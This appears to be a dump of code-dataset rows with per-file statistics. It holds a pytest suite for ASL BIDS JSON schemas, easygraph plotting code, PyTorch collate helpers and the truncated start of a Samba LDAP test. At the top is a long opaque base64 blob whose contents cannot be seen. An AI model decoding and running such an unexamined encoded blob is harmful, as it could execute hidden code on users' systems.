bjuBNSrInmKKSlTt4s69Rsxlq9j9ls1m5YRZsi/PoCrbRHWy9h1uUBxln8V6vVtrnW1znedIe6QfDQKHCilTzuJnIo2uZRPEUXc98OeZcyAtPZmMetSxJE87uR7gqW7BxM8PNO9j34j6Fb5mJ8fPPSe5PQdlFojr1EVmBZW4FZjyFRyaeDZzBt5E0a9pgPgLO4/IiwBs1moyo/QIOSZFsIWi8npSx2F9gxiQRYlYYb/ITNus4EafhWxp33g4yLsn3t1k7OkqLgSbJgSaJkyZZQk3i7y0FsSRCBFenHFIBxSNMKaBRIMn+MAll2xD9vpmTGrkiNgxW2VXXylWQmFwsI22RUMV14VLSF6W0t50MPZwtF4vlbdAN+NzbvKK443scknKZ/aTccU/K+avbJ1fXzUr6WKld2fDyvgzf/4AZSLAswiVVp7DLM4H9rpBEWeZb6s7fRsOSCLYBYB3A9R1+DcomQ6nf/bpMRCLBgti5J2VEHK2JQVjcQTLnk2iHoN0RZXwnCXp+k0QNWOwNdtQdaMbDYg+BMbBkXQYSyhAJ/SORUBqLZNBw4bKISAJG0kmmidgVd/sEFRpSV+shxdnjj5XdOAqyoesPr7I92G0kUJIN7SUpBQPbgyF2kHVD/kMwUYb2UmRO9bLdJMZdB3dTtIFRXj+iLFm7CsLYTzD+YaQxjANfLoynPRj7IgjjQQ846HuwOWqHxAiGWiL3u+wLRO5eZMm6SgT4DCH3p5HATovI4HALMujjIuKI/+BZbp8eZW4/cweEJwb+BmtLPFdXR63LGfZznuc5WYx+g3B6wtgTBQ1z/QX2m8BTaeYexDA4wgR2N5DvINtNU/eRQDX9BM7jRTG4t73B6SOwAjyPBQbMMGoeWDmShS8x6ZMZOXWyRpmSkEPmn7uOtiXmNTGGSSeH7eE8ughoq4qNo3QyrXWVWiNLigvZ08xz0YIaJNcslskJM9VRb6KhOg/Cl0vXgOWMlnBujRer6XqKCecu7NZwIqrJpG2wS2YCVUYTAr3NsI1GExrtdZxqn9DJcxZXx/BXNK0t0gcqV+rkyFXBJl5FcxWt2ZxTXXUKtrkKEj48GLL+TxTNkulevkA/ZC84J0IzF459YQfMhPxBNVuA9Q//AH9+cIUmQR4tMGhQraC/nLblqvMcf0T3Z0uqh/+iq9kuJMbGxsheBQxkGTGEbYwtFMj2h3mAxnPVbbNYVFfhvlIxNFvdMGwDK42Xarcc62/2//FX//mN96+QOisg3qi00JhGVJ1fS5OW4EGYTalMvkn+TpASO/fTu+T1GQyKKZIrMWD2GN+YouBSNmMoRMBgQB8p+UFBhOgkRdAT81O0Y6lih6iYIjYgwxV3ntBfEqUI7HlxOytLZbk8wQc8zgOMxf1J+JgM1B+m0OmT8Jw+JxUQYsGueDc9shsuxRp30+F1w2q7mUshFL0ARaoBFKn2ofgYw1Le+FJtQZFqDoWQutb3O8JQnIkEoUi1hCLVHArZzVc6EAoQ9ygb66BItw/F30eCUKTbgiLdHIq0GOOHyTAUV6JBKNItoUg3h0J2M5VEKPoBikwDKDLtQ/FpNAhFpi0oMs2hyIgx/k4iDMUvxYJQZFpCkdkPikyom5EE2EF72QYwZNuH4V9jQRiybcGQbQ6DeGS9HQ/D8PV4EIZsSxiyzSlCdjMcB/tsr7MBDJ3cLd4cgH+LBwHoDAIwuB8Anc0B6BQjexILA5BPBAHobAlAZ3MAZDdqTLJEVwMQutqnhf9OBKHoaosWuppD0SXGuBsNQ/EwGYSiqyUUXc2hkN0MRMH+3utuAEN3+zD8IhmEobstGLqbw9AtxleNhGHQO4IwdLeEobs5DLKbrghsP/Z6GsDQ0z4MsVQQhp62YOhpDkOPGJ+lhGHYSgVh6GkJQ09zGGQ3SQU2Q3u9DWDobR+GTDoIQ29bMPQ2h6FXjG+dhWGw00EYelvC0NscBtkNxj+S6A7AzSptew6TCwj9UxTSmZic+nxxMtrZ5PFAjO/Iniw9WKyKWPJDlbKmS+R4UXdVJ8mE0/5ciYz521srwSM+moPXdMOoWX5E+qLEZuGBHyJ7yFuWTcX4ZM74B4b4qGqHRf5ELHiW5n/u/DR5BeFbJicnp6bOnCE3FQ6VN48PJsYnx6fGeXICS/EktjVNrjUeM6sUTdd3xefPM+l69z3x4RgcNYPbC0unOAokMU0OX34Oxl7nxzhho5bHyAztIak3XJMJ2vKRm54f6tmir0LFKzHppaa81BkvddZLTXupc17qvJe6QAOlHsf9wzqFCo9DlreckMONx+E105pSRLyOKQllQIkqaeUFivoNwHUI7vojPUqvl/7yniZaPD36pbX8tE8PRaKKSRtm3LdjfPvOhqFW7DIdFdrQHBWYpFI0XEMn/qEStCG+/bXctQV+wiRHh/nxLBr3yQuXPHpfR9CR2/CwhU+/xz0irokkUfCpJnz8siRnm7PBbSY98a9IenFcmweTDSvPZGZJqxAH5fHUVX5GZpu664egaDJv0NUkLiAqtzT+VcprskyFe38pOrGCl9cCZEkD+XfM+D0sBcAn6DcrQtJRZVg5QOnewGGyDOVikDqt9ClH9i2NIYGMcrymrB/ITtJ1QMTC5CcVPfCjrNJDMbGTUKs+lIBjbTOUcN4LJbwWDCVsJryzmSLanQwd6ayLKaRrwwn8jBuPKWSeJqaAj0eGRUgBHUxmUQSDvfNH+wYV5IG4mqCCjCmgqKyPpfK4QjZM3o3iCjVU7AcXMK+wUTYLRovowmWkKqVBdKFr/+gCIkMcsR5rP7rwUYvoAo8aMbHY70SYd8runSilKar5TozSFNR8J05p8k2/kwj41TPcIMkKr3bn5/Srd5FfvbsuPHFUQbKMixNAWeHhlvEu7iY+sI+jXQypr/WQ4uzxwQg62ftDTvYBz8neHXSyHyQn+2CNk/1QwMn+UFmy/pLCE0O0DpPRxuvwzP+7dTi8zzp8FPHW4chTrsOzYkhHW67Fb7EvcC3+JbJkXSCeeI7W4tWoDHgc47hTDGLfeTSIRxxjbh9GExrEOUSJF+rqHK/LCbR7guf04ht8XpzjSYQ9ibInMfYkzp4k2FoSX+sTYY8BEaMQYY+DwbCHbEV/Cad1Sow1EPY4DevA82rCHqN1YQ9U4vP8wNmpk7WHCLwzN/hs7jq+tsFFt3fo/FwJRXTgmJ046q6Giky2LjLVusiZ1kXONi7ytAGbfhYO2Mza5ZIqYzY84jB80lNKFJmZxbB4+4EZsm3yV7E4qgHaiPGgTMqHXcRh6kYi8hsM4CnDMGjlpfD1HD8W0+AwRnDz1iDcQec4fMszHIo5wp81DsVgHOZSuMBC8Y3PFYTx4kF+0AUJ1gu6zMabB12ejQuJGeESLcoG3+aeAt9DEJMegpiQZhjvjZOH4CfkLYhQvJdX7JBb9xSJ8ogQdmLrLksJPy4+qPEQ4GPauv9KDCQ+Cs1O7iE4pqBGbdhVt+wq6Iyo7SpZ5yXwuuqP1YMQbR+EP1OCIETbAiHaHISoGNkb0TAII5EgCNG2QIg2B0F21R2tByHWPgg/jQRBiLUFQqw5CDHfcxgCYTQaBCHWFgix5iDIrtKRehDi7YPw19EgCPG2QIg3ByEuRlZRwiBMxsB6bNzVviDE9wMhE+oqrtSDkGgfhJ/FgiAk2gIh0RyEhBjZFguDcC4eBCHRFgiJ5iAk9vUc8jP416Q58DQewxa+uYYuQ9TV/qsqtKW8gVlP7TXsoj0dZFQwAxskB4naqDDfPM6zkEektUeP+z0WUIejNsrjvyvIo7fD9975Prv8HbzcxcK0V/ZcFvlFvNzDyxJe7uPlG3VbT/R7fD3iOTS4j63ep+Sn/2+fHYq278OS73YEfFjqxfwqE4dF6cxK/RkUOtH+RXqxcDOfL3jrSP4rHS8GXshuW2PSs+B5rPL4blDgxPQGXkxv0TfxsoUXXLB8Ua5ju4vurXcJvn+BroYf0nrXOrD4exX89/M5s9qp2ci1FW/q2hq+39C15R3yxoM4+7xnKbL5ZlaX70XF5MFpb08TZ9IFxXcruKYFzVXH1lZ9RxSZyLXkg/5pFY++q9RIozduaPn3c/vg4H+EvNdFayGPk6IbkN7UWVnBHlZW6LQZtc59oDsOkRuVwTcD6FVbhMQ2uPtUs/Ryib9VoTkbRXOVXrBx6R+0gP1MVEyP1w0XpSzVqtpFWbIAstA04I54wEUCL1WLrin4Dg9BVcrlIvfA4oTn8DVml15KIgD4iz6au0Etmw7+XxW3j/kvH40ZjwsGP6KVj0jWoSHh4EF60nxW+UtJjlkSrw1XbGJDPksDX0ly0QXnGK5urGkwRPo/FzhFWgHcTnF/HC4fvUXE+RFPa5O7mRy6nGWRM2hJBPZ4qA2wb7x2VOZl/p9gvoJjc1BeR5VvK/2wgkj1fUC3PfTtn/3uIa7oTOL3AWUBT4D3JCKpkVQ6dTR1OKXCpzf1GVPg+iepVFb5H1pnHaQ="))))
| 2,201.5
| 8,722
| 0.966727
| 269
| 8,806
| 31.64684
| 0.966543
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144644
| 0.001363
| 8,806
| 4
| 8,722
| 2,201.5
| 0.823402
| 0.005678
| 0
| 0
| 0
| 0.5
| 0.989945
| 0.989945
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
3e33af8fadad4d484852f7e1c912c8352e09aafd
| 13,216
|
py
|
Python
|
src/test_asl_schema.py
|
gold-standard-phantoms/BIDS-JSON-Schema
|
b24de8b444646d2716eb9ca72922139ec1d1d436
|
[
"MIT"
] | null | null | null |
src/test_asl_schema.py
|
gold-standard-phantoms/BIDS-JSON-Schema
|
b24de8b444646d2716eb9ca72922139ec1d1d436
|
[
"MIT"
] | null | null | null |
src/test_asl_schema.py
|
gold-standard-phantoms/BIDS-JSON-Schema
|
b24de8b444646d2716eb9ca72922139ec1d1d436
|
[
"MIT"
] | null | null | null |
import json
import pytest
import os
from definitions import SRC_ROOT
from jsonschema import Draft7Validator
@pytest.fixture()
def set_test_variables():
"""
Sets up variables for the unit tests below.
:return: dictionary of test input variables for the unit tests.
"""
test_variables = {
"asl_valid_full": os.path.join(
SRC_ROOT, "resources/schemas/tests_jsons/asl_valid/test_asl_schema001.json"
),
"asl_valid_absent_conditional_field": os.path.join(
SRC_ROOT, "resources/schemas/tests_jsons/asl_valid/test_asl_schema002.json"
),
"asl_valid_labeling_duration_array": os.path.join(
SRC_ROOT, "resources/schemas/tests_jsons/asl_valid/test_asl_schema003.json"
),
"asl_schema": os.path.join(SRC_ROOT, "resources/schemas/asl_bids_schema.json"),
}
return test_variables
def test_valid_data_all_fields_specified(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-001
:req_id: D2N-FUN-REQ-003
:description: This test verifies that a valid structure following exactly the definition set in the json schema gets
validated correctly.
:inputs: A dictionary object following exactly the structure defined in the asl schema, with all fields mandatory and
optional specified.
:criteria: This test is considered passed if the validation method returns True.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
validator = Draft7Validator(schema=schema)
validator.check_schema(schema)
valid = validator.is_valid(instance=data)
assert valid is True
def test_valid_data_missing_conditional_field(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-002
:req_id: D2N-FUN-REQ-003
:description: This test verifies that a valid structure following the definition set in the json schema gets validated
correctly.
:inputs: A dictionary object following exactly the structure defined in the asl schema but missing a conditional field.
:criteria: This test is considered passed if the validation method returns True.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_absent_conditional_field"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is True
def test_invalid_data_missing_conditional_field(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-011
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema but missing a conditional
field, the related field (BolusCut-offFlag) to the condition is set to true so our conditional field
(BolusCut-offDelayTime) is mandatory but missing.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_absent_conditional_field"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# mess up data so validation fails
# set this key to true and the validator should pick up on the missing conditional field
data["BolusCut-offFlag"] = True
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_valid_data_conditional_type_array(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-003
:req_id: D2N-FUN-REQ-003
:description: This test verifies that a valid structure following the definition set in the json schema gets
validated correctly.
:inputs: A dictionary object following largely the structure defined in the asl schema. The twist here is the
LabelingDuration field is an array instead of a single int, as this is allowed in the schema this should not affect
the validation.
:criteria: This test is considered passed if the validation method returns True.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_labeling_duration_array"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is True
def test_invalid_data_wrong_field_type(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-004
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The 'mistake' here, is that a
field identified as an array in the schema is replaced by a single numeric value.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Should be an array let's replace it with an integer
data["BackgroundSuppressionPulseTime"] = 16
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_missing_required_key(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-005
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The 'mistake' here, is that a
field identified as required in the schema is omitted.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Let's remove a required key
data.pop("EchoTime", 0)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_wrong_type_in_array(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-006
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The 'mistake' here, is that a
field identified as an array of numbers in the schema is replaced by an array containing numbers and a string.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Should be an array of numbers, will put a string in the list
data["FlipAngles"] = [0, "yeah messing around", 14, 60]
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_unexpected_field_value(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-007
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The 'mistake' here, is that a
field whose possible values are set in an enumeration in the schema is set to an unexpected (not part of the
enumeration) value.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Value should be part of an enum, but let's fill in an unexpected value
data["ASLContext"] = "And still the type is right"
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_wrong_array_size(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-008
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The 'mistake' here, is that a
field identified as an array in the schema is set to an array of the wrong size.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Array should have three tuples of two elements each, let's change that
data["LabelingOrientation"] = [[12, 11], [10, 12], [7, 6], [2, 2]]
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_wrong_internal_array_size(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-009
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The 'mistake' here, is that a
field identified as an array in the schema is set to an array with an inner element of the wrong size.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Array should have three tuples of two elements each, let's change that
data["LocationOfLabelingPlane"] = [[12, 11], [10, 12], [7, 6, 5]]
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_multiple_errors(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-010
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object following largely the structure defined in the asl schema. The object gathers all the
mistakes tested previously.
:criteria: This test is considered passed if the validation method returns False. and the number of errors is
correctly estimated (6)
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Let's take all examples from the tests above
data["LocationOfLabelingPlane"] = [[12, 11], [10, 12], [7, 6, 5]]
data["LabelingOrientation"] = [[12, 11], [10, 12], [7, 6], [2, 2]]
data["ASLContext"] = "And still the type is right"
data["FlipAngles"] = [0, "yeah messing around", 14, 60]
data["BackgroundSuppressionPulseTime"] = 16
data.pop("EchoTime", 0)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
error_count = 0
for error in validator.iter_errors(instance=data):
error_count += 1
assert error_count == 6
| 39.807229
| 123
| 0.711789
| 1,937
| 13,216
| 4.713474
| 0.112545
| 0.055203
| 0.059584
| 0.045783
| 0.847097
| 0.829025
| 0.825411
| 0.819606
| 0.784666
| 0.768018
| 0
| 0.01761
| 0.200817
| 13,216
| 331
| 124
| 39.927492
| 0.846809
| 0.443932
| 0
| 0.763514
| 0
| 0
| 0.156553
| 0.072556
| 0
| 0
| 0
| 0
| 0.081081
| 1
| 0.081081
| false
| 0
| 0.033784
| 0
| 0.121622
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e43d7887767ef9a3df119ea5e06bbc22357dab5b
| 3,706
|
py
|
Python
|
easygraph/functions/drawing/drawing.py
|
coreturn/Easy-Graph
|
ee46d84250c4d4cf22271ca13449b15fad88ad7b
|
[
"BSD-3-Clause"
] | null | null | null |
easygraph/functions/drawing/drawing.py
|
coreturn/Easy-Graph
|
ee46d84250c4d4cf22271ca13449b15fad88ad7b
|
[
"BSD-3-Clause"
] | null | null | null |
easygraph/functions/drawing/drawing.py
|
coreturn/Easy-Graph
|
ee46d84250c4d4cf22271ca13449b15fad88ad7b
|
[
"BSD-3-Clause"
] | null | null | null |
import easygraph as eg
import matplotlib.pyplot as plt
import numpy as np
import random
__all__=[
"draw_SHS_center",
"draw_SHS_center_kk",
"draw_kamada_kawai"
]
def draw_SHS_center(G,SHS):
"""
Draw the graph whose the SH Spanners are in the center, with random layout.
Parameters
----------
G : graph
A easygraph graph.
SHS : list
The SH Spanners in graph G.
Returns
-------
graph : network
the graph whose the SH Spanners are in the center.
"""
pos=eg.random_position(G)
center=np.zeros((len(SHS),2),float)
node=np.zeros((len(pos),2),float)
m,n=0,0
for i in pos:
if i in SHS:
node[m][0]=0.5+(-1)**random.randint(1,2)*pos[i][0]/5
node[m][1]=0.5+(-1)**random.randint(1,2)*pos[i][1]/5
center[n][0]=node[m][0]
center[n][1]=node[m][1]
pos[i][0]=node[m][0]
pos[i][1]=node[m][1]
m+=1
n+=1
else:
node[m][0]=pos[i][0]
node[m][1]=pos[i][1]
m+=1
plt.scatter(node[:,0], node[:,1], marker = '.', color = 'b', s=10)
plt.scatter(center[:,0], center[:,1], marker = '*', color = 'r', s=20)
k=0
for i in pos:
plt.text(pos[i][0], pos[i][1], i,
fontsize=5,
verticalalignment="top",
horizontalalignment="right")
k+=1
for i in G.edges:
p1=[pos[i[0]][0],pos[i[1]][0]]
p2=[pos[i[0]][1],pos[i[1]][1]]
plt.plot(p1,p2, 'k--',alpha=0.3)
plt.show()
return
def draw_SHS_center_kk(G,SHS):
"""
Draw the graph whose the SH Spanners are in the center, with a Kamada-Kawai force-directed layout.
Parameters
----------
G : graph
A easygraph graph.
SHS : list
The SH Spanners in graph G.
Returns
-------
graph : network
the graph whose the SH Spanners are in the center.
"""
pos=eg.kamada_kawai_layout(G)
center=np.zeros((len(SHS),2),float)
node=np.zeros((len(pos),2),float)
m,n=0,0
for i in pos:
if i in SHS:
node[m][0]=pos[i][0]/5
node[m][1]=pos[i][1]/5
center[n][0]=node[m][0]
center[n][1]=node[m][1]
pos[i][0]=node[m][0]
pos[i][1]=node[m][1]
m+=1
n+=1
else:
node[m][0]=pos[i][0]
node[m][1]=pos[i][1]
m+=1
plt.scatter(node[:,0], node[:,1], marker = '.', color = 'b', s=10)
plt.scatter(center[:,0], center[:,1], marker = '*', color = 'r', s=20)
k=0
for i in pos:
plt.text(pos[i][0], pos[i][1], i,
fontsize=5,
verticalalignment="top",
horizontalalignment="right")
k+=1
for i in G.edges:
p1=[pos[i[0]][0],pos[i[1]][0]]
p2=[pos[i[0]][1],pos[i[1]][1]]
plt.plot(p1,p2, 'k--',alpha=0.3)
plt.show()
return
def draw_kamada_kawai(G):
"""Draw the graph G with a Kamada-Kawai force-directed layout.
Parameters
----------
G : graph
A networkx graph
"""
pos=eg.kamada_kawai_layout(G)
node=np.zeros((len(pos),2),float)
m,n=0,0
for i in pos:
node[m][0]=pos[i][0]
node[m][1]=pos[i][1]
m+=1
plt.scatter(node[:,0], node[:,1], marker = '.', color = 'b', s=10)
k=0
for i in pos:
plt.text(pos[i][0], pos[i][1], i,
fontsize=5,
verticalalignment="top",
horizontalalignment="right")
k+=1
for i in G.edges:
p1=[pos[i[0]][0],pos[i[1]][0]]
p2=[pos[i[0]][1],pos[i[1]][1]]
plt.plot(p1,p2, 'k--',alpha=0.3)
plt.show()
return
| 24.872483
| 102
| 0.490826
| 599
| 3,706
| 2.998331
| 0.126878
| 0.071269
| 0.044543
| 0.026726
| 0.886414
| 0.886414
| 0.864143
| 0.853007
| 0.853007
| 0.830735
| 0
| 0.05684
| 0.311657
| 3,706
| 148
| 103
| 25.040541
| 0.647197
| 0.178899
| 0
| 0.828283
| 0
| 0
| 0.032025
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.040404
| 0
| 0.10101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e49b5a508a98e7501797e89f84d22f59d1b5eac0
| 1,515
|
py
|
Python
|
cords/utils/data/data_utils/collate.py
|
krishnatejakk/AUTOMATA
|
fd0cf58058e39660f88d9d6b4101e30a497f6ce2
|
[
"MIT"
] | null | null | null |
cords/utils/data/data_utils/collate.py
|
krishnatejakk/AUTOMATA
|
fd0cf58058e39660f88d9d6b4101e30a497f6ce2
|
[
"MIT"
] | null | null | null |
cords/utils/data/data_utils/collate.py
|
krishnatejakk/AUTOMATA
|
fd0cf58058e39660f88d9d6b4101e30a497f6ce2
|
[
"MIT"
] | 1
|
2022-03-16T05:55:12.000Z
|
2022-03-16T05:55:12.000Z
|
import torch
def collate_fn_pad_batch(data):
"""Pad data in a batch.
Parameters
----------
data : list((tensor, int), )
data and label in a batch
Returns
-------
tuple(tensor, tensor)
"""
num_items = len(data[0])
max_len = max([i[0].shape[0] for i in data])
labels = torch.tensor([i[1] for i in data], dtype=torch.long)
padded = torch.zeros((len(data), max_len), dtype=torch.long)
if num_items == 3:
weights = torch.tensor([i[2] for i in data], dtype=torch.float)
# randomizing might be better
for i, _ in enumerate(padded):
padded[i][:data[i][0].shape[0]] = data[i][0]
if num_items == 3:
return padded, labels, weights
else:
return padded, labels
def max_len_pad(data):
"""Pad data globally.
Parameters
----------
data : list((tensor, int), )
data and label in a batch
Returns
-------
tuple(tensor, tensor)
"""
max_len = -1
for sample in data:
print(sample[0])
num_items = len(data[0])
labels = torch.tensor([i[1] for i in data], dtype=torch.long)
padded = torch.zeros((len(data), max_len), dtype=torch.long)
if num_items == 3:
weights = torch.tensor([i[2] for i in data], dtype=torch.float)
# randomizing might be better
for i, _ in enumerate(padded):
padded[i][:data[i][0].shape[0]] = data[i][0]
if num_items == 3:
return padded, labels, weights
else:
return padded, labels
| 29.134615
| 71
| 0.576238
| 220
| 1,515
| 3.890909
| 0.213636
| 0.03271
| 0.049065
| 0.058411
| 0.834112
| 0.796729
| 0.796729
| 0.796729
| 0.796729
| 0.796729
| 0
| 0.018083
| 0.269967
| 1,515
| 52
| 72
| 29.134615
| 0.755877
| 0.220462
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0
| 0.241379
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5f7c90db2376246d8d6e00a7a2e2313b378713c8
| 98,794
|
py
|
Python
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/sam.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2019-01-13T09:19:10.000Z
|
2019-02-15T01:21:02.000Z
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/sam.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | null | null | null |
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/sam.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2020-03-08T01:58:25.000Z
|
2020-12-20T10:34:54.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This is a port of the original in testprogs/ejs/ldap.js
import optparse
import sys
import os
sys.path.insert(0, "bin/python")
import samba
samba.ensure_external_module("testtools", "testtools")
samba.ensure_external_module("subunit", "subunit/python")
import samba.getopt as options
from samba.auth import system_session
from ldb import SCOPE_BASE, LdbError
from ldb import ERR_NO_SUCH_OBJECT, ERR_ATTRIBUTE_OR_VALUE_EXISTS
from ldb import ERR_ENTRY_ALREADY_EXISTS, ERR_UNWILLING_TO_PERFORM
from ldb import ERR_OTHER, ERR_NO_SUCH_ATTRIBUTE
from ldb import ERR_OBJECT_CLASS_VIOLATION
from ldb import ERR_CONSTRAINT_VIOLATION
from ldb import ERR_UNDEFINED_ATTRIBUTE_TYPE
from ldb import Message, MessageElement, Dn
from ldb import FLAG_MOD_ADD, FLAG_MOD_REPLACE, FLAG_MOD_DELETE
from samba.samdb import SamDB
from samba.dsdb import (UF_NORMAL_ACCOUNT, UF_ACCOUNTDISABLE,
UF_WORKSTATION_TRUST_ACCOUNT, UF_SERVER_TRUST_ACCOUNT,
UF_PARTIAL_SECRETS_ACCOUNT, UF_TEMP_DUPLICATE_ACCOUNT,
UF_PASSWD_NOTREQD, ATYPE_NORMAL_ACCOUNT,
